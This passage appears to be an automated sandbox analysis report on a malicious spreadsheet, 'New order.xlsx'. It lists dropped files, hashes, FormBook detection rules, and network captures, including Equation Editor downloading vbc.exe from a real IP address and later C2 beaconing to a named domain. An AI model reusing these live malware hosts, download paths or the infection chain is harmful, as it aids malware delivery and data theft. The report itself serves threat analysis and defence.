                                        SHA-512:9E9F1DA33F13F2DF7BC626E56D1138AEE3EC44EDFF73FC5E8D97206B8EAC576D76E621C1C7168D17A6292F61EF3A6624D69F3B2D054888B9A67FC4114E2E1CB8
                                        Malicious:false
                                        Preview:VA5==.Y.Y......M=<.}.<0.]<.}.<0.U...=....===..Q=..9..-....U.===..e..i..9..-....Uc===..m..q..9..-....Un===..u..y..9..-....U.===..}...J-A..5..}@@.9...]..a..-.UA.v..U..Y..U...A~.o.-.TN..U@..A.......Q.aM..U====.A!Bx.....e...m...u....}....]...U..S.-...9T....Q..[>.M..e...5<B..M@..U====..!A ===.A!:x..Q...M...v.9=.Y..<.}.<0...5.=..9....5.=..-.1~..~A......5.=...5.>.....v.9=.3.LU.?==U.?==.1=...lLU.?==U.?==.5=.:.LU.?==U.?==.5=.Y.Y.<.}.<0.U...-===..e....J.=.3...==.............XaU.B==.}....5..5..v=..:e..:i..U..5.~^=..:e..:i.?.5..}=..Be....lLUx>==.Uo....QX<..U...5U.....Q.JQ=.C..M=XD..M>===..Mv.A=.Y.Y.<.}.<0.U....===..}....J.=.3...==.............XaU.A==.}<..===..5..5..v=..:}..:...9..5.~^=..:}..:...-..5.n^..:}..:...1.v.5..o@..2}..2...U..5.~^?..:}..:..B.5..}=..B}..3.LU_===.UV....Q.J%=.5..U..%.>X4..%..1..-..9..5U.....Q.JQ=.C..M=XD..M>===..Mv.1=.Y.Y)...-===..a....J.=.3...==.............XaU.@==.}....5..5..v=..:a..:U..9..5.~^=..:a..:U.?.5..}=..Ba..:.LU"===.U.....QX;..9..5U...
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:CDFV2 Encrypted
                                        Category:dropped
                                        Size (bytes):95744
                                        Entropy (8bit):7.925838515197252
                                        Encrypted:false
                                        SSDEEP:1536:R9yvDYqJYNgVY6VdpHgqGFicn33zXfU7QY3S/u0vf51Ht5M9fdCdRJ85+3Qx:RSigV9nennzPBY3QV5M9FCdDW+3O
                                        MD5:70583AA55602C8BA0A7F85D815CB5806
                                        SHA1:7123ADF1A048A8168457DCB5AAA9FEAD90E40218
                                        SHA-256:4DA5CB33B2F19FC2D80CAFE3E9E9F1A7071D65724EA9316C86C1A635105BAB44
                                        SHA-512:B3E3F857E55F641BD1C7E25450A7D0126E3749459F998DEA905E03752F6F42A0950E086C55DBB3E632B889EC698566E71A396FD0971EB53180CFC61FB95E5246
                                        Malicious:false
                                        Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):165
                                        Entropy (8bit):1.4377382811115937
                                        Encrypted:false
                                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                        MD5:797869BB881CFBCDAC2064F92B26E46F
                                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                        Malicious:true
                                        Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:dropped
                                        Size (bytes):277920
                                        Entropy (8bit):7.911203365939466
                                        Encrypted:false
                                        SSDEEP:6144:LOtIOb+kdk/PekMHsLKhnbdAnYlqQZvtBA6o3fX:LOLbhdkXekMMLAnbuYlL7BAP
                                        MD5:69250F55FBFE48822C838B4EEAF33A0A
                                        SHA1:3E4E1DD9DBEB98EC354F7A03D455A0A38CCEA4E5
                                        SHA-256:752D0155C769033832D6845EABBA29BCE2B9D0EEDFF734B31A49C879ED08FF72
                                        SHA-512:8BB1F40992A1E829D7B6CE9751DEC84D849C50BDF72A1BCD8DA9362C8CCA0521729F9031FCF6F19438C147702EB601B31FCEC9EA9E230E2A00B0ED9B679E6AA6
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 37%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:.....F6............@...........................;...........@...........................................;.P............................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data.....9.........................@....ndata........:..........................rsrc...P.....;.....................@..@................................................................................................................................................................................................................................................................................................................................................
                                        File type:CDFV2 Encrypted
                                        Entropy (8bit):7.925838515197252
                                        TrID:
                                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                        File name:New order.xlsx
                                        File size:95744
                                        MD5:70583aa55602c8ba0a7f85d815cb5806
                                        SHA1:7123adf1a048a8168457dcb5aaa9fead90e40218
                                        SHA256:4da5cb33b2f19fc2d80cafe3e9e9f1a7071d65724ea9316c86c1a635105bab44
                                        SHA512:b3e3f857e55f641bd1c7e25450a7d0126e3749459f998dea905e03752f6f42a0950e086c55dbb3e632b889ec698566e71a396fd0971eb53180cfc61fb95e5246
                                        SSDEEP:1536:R9yvDYqJYNgVY6VdpHgqGFicn33zXfU7QY3S/u0vf51Ht5M9fdCdRJ85+3Qx:RSigV9nennzPBY3QV5M9FCdDW+3O
                                        TLSH:F993F100F4AC60DAD5AA87BD8833F865C2299C81974EE5CD2D97374BF77C6824E322C5
                                        File Content Preview:........................>......................................................................................................................................................................................................................................
                                        Icon Hash:e4e2aa8aa4b4bcb4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 13, 2022 17:21:05.752494097 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:05.867383003 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:05.867619991 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:05.868827105 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:05.986473083 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:05.986502886 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:05.986537933 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:05.986560106 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:05.986582041 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:05.986605883 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:05.986628056 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:05.986651897 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:05.986669064 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:05.986687899 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:05.986706018 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:05.986752033 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:05.986764908 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.050508976 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.102085114 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.102163076 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.102196932 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.102227926 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.102262974 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.102287054 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.102298975 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.102323055 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.102355003 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.102366924 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.102392912 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.102410078 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.102442980 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.102451086 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.102478027 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.102487087 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.102514982 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.102525949 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.102550030 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.102560997 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.102586985 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.102596998 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.102622986 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.102641106 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.102674961 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.102682114 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.102708101 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.102718115 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.102742910 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.102751970 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.102775097 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.102786064 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.102818012 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.114017010 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.217485905 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.217550993 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.217602968 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.217638016 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.217669010 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.217693090 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.217714071 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.217736006 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.217763901 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.217781067 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.217791080 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.217822075 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.217833996 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.217860937 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.217871904 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.217902899 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.217916012 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.217942953 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.217952967 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.217983007 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.217994928 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.218024015 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.218034029 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.218060970 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.218075037 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.218106985 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.218116999 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.218144894 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.218157053 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.218187094 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.218198061 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.218225002 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.218236923 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.218266964 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.218277931 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.218305111 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.218314886 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.218347073 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.218358040 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.218386889 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.218396902 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.218430042 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.218441010 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.218466997 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.218477011 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.218509912 CEST | 80 | 49171 | 104.168.33.25 | 192.168.2.22
May 13, 2022 17:21:06.218522072 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
May 13, 2022 17:21:06.218548059 CEST | 49171 | 80 | 192.168.2.22 | 104.168.33.25
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 13, 2022 17:22:14.484644890 CEST | 55868 | 53 | 192.168.2.22 | 8.8.8.8
May 13, 2022 17:22:14.551302910 CEST | 53 | 55868 | 8.8.8.8 | 192.168.2.22
May 13, 2022 17:22:30.809808969 CEST | 49688 | 53 | 192.168.2.22 | 8.8.8.8
May 13, 2022 17:22:30.974128962 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 13, 2022 17:22:14.484644890 CEST | 192.168.2.22 | 8.8.8.8 | 0xceee | Standard query (0) | www.insurancecentral.info | A (IP address) | IN (0x0001)
May 13, 2022 17:22:30.809808969 CEST | 192.168.2.22 | 8.8.8.8 | 0xc4a9 | Standard query (0) | www.xinli-ac.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 13, 2022 17:22:14.551302910 CEST | 8.8.8.8 | 192.168.2.22 | 0xceee | Name error (3) | www.insurancecentral.info | none | none | A (IP address) | IN (0x0001)
May 13, 2022 17:22:30.974128962 CEST | 8.8.8.8 | 192.168.2.22 | 0xc4a9 | No error (0) | www.xinli-ac.com | | 154.222.70.249 | A (IP address) | IN (0x0001)
                                        • 104.168.33.25
                                        • www.xinli-ac.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49171 | 104.168.33.25 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | kBytes transferred | Direction | Data
May 13, 2022 17:21:05.868827105 CEST | 2 | OUT | GET /gtb/vbc.exe HTTP/1.1
                                        Accept: */*
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: 104.168.33.25
                                        Connection: Keep-Alive
May 13, 2022 17:21:05.986473083 CEST | 3 | IN | HTTP/1.1 200 OK
                                        Date: Fri, 13 May 2022 15:21:05 GMT
                                        Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
                                        Last-Modified: Fri, 13 May 2022 09:01:34 GMT
                                        ETag: "43da0-5dee0ebd81a80"
                                        Accept-Ranges: bytes
                                        Content-Length: 277920
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: application/x-msdownload


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        1 | 192.168.2.22 | 49172 | 154.222.70.249 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        May 13, 2022 17:22:31.353377104 CEST | 296 | OUT | GET /m9y5/?3f=ylBe/k3Uhk7dBIeXI//KFRH0TaC7pxYziRrYgQ8MI5uD9iOXGI4rYw0cjZ+4cEk1rP/qTw==&-Z=f4l0drr HTTP/1.1
                                        Host: www.xinli-ac.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        May 13, 2022 17:22:31.687582970 CEST | 297 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Fri, 13 May 2022 15:22:32 GMT
                                        Content-Type: text/html
                                        Content-Length: 1736
                                        Connection: close
                                        Vary: Accept-Encoding


                                        Code Manipulations

                                        Function Name | Hook Type | Active in Processes
                                        PeekMessageA | INLINE | explorer.exe
                                        PeekMessageW | INLINE | explorer.exe
                                        GetMessageW | INLINE | explorer.exe
                                        GetMessageA | INLINE | explorer.exe
                                        Function Name | Hook Type | New Data
                                        PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xEC
                                        PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xEC
                                        GetMessageW | INLINE | 0x48 0x8B 0xB8 0x86 0x6E 0xEC
                                        GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8E 0xEE 0xEC


                                        Target ID:0
                                        Start time:17:21:15
                                        Start date:13/05/2022
                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                        Imagebase:0x13f340000
                                        File size:28253536 bytes
                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:2
                                        Start time:17:21:41
                                        Start date:13/05/2022
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                        Imagebase:0x400000
                                        File size:543304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:4
                                        Start time:17:21:47
                                        Start date:13/05/2022
                                        Path:C:\Users\Public\vbc.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\Public\vbc.exe"
                                        Imagebase:0x400000
                                        File size:277920 bytes
                                        MD5 hash:69250F55FBFE48822C838B4EEAF33A0A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 37%, ReversingLabs
                                        Reputation:low

                                        Target ID:5
                                        Start time:17:21:51
                                        Start date:13/05/2022
                                        Path:C:\Users\user\AppData\Local\Temp\fdvucso.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
                                        Imagebase:0x1320000
                                        File size:80384 bytes
                                        MD5 hash:8CA00DF697FFA200C6CA558754C49F37
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        Target ID:6
                                        Start time:17:21:54
                                        Start date:13/05/2022
                                        Path:C:\Users\user\AppData\Local\Temp\fdvucso.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
                                        Imagebase:0x1320000
                                        File size:80384 bytes
                                        MD5 hash:8CA00DF697FFA200C6CA558754C49F37
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        Target ID:7
                                        Start time:17:21:58
                                        Start date:13/05/2022
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0xff040000
                                        File size:3229696 bytes
                                        MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
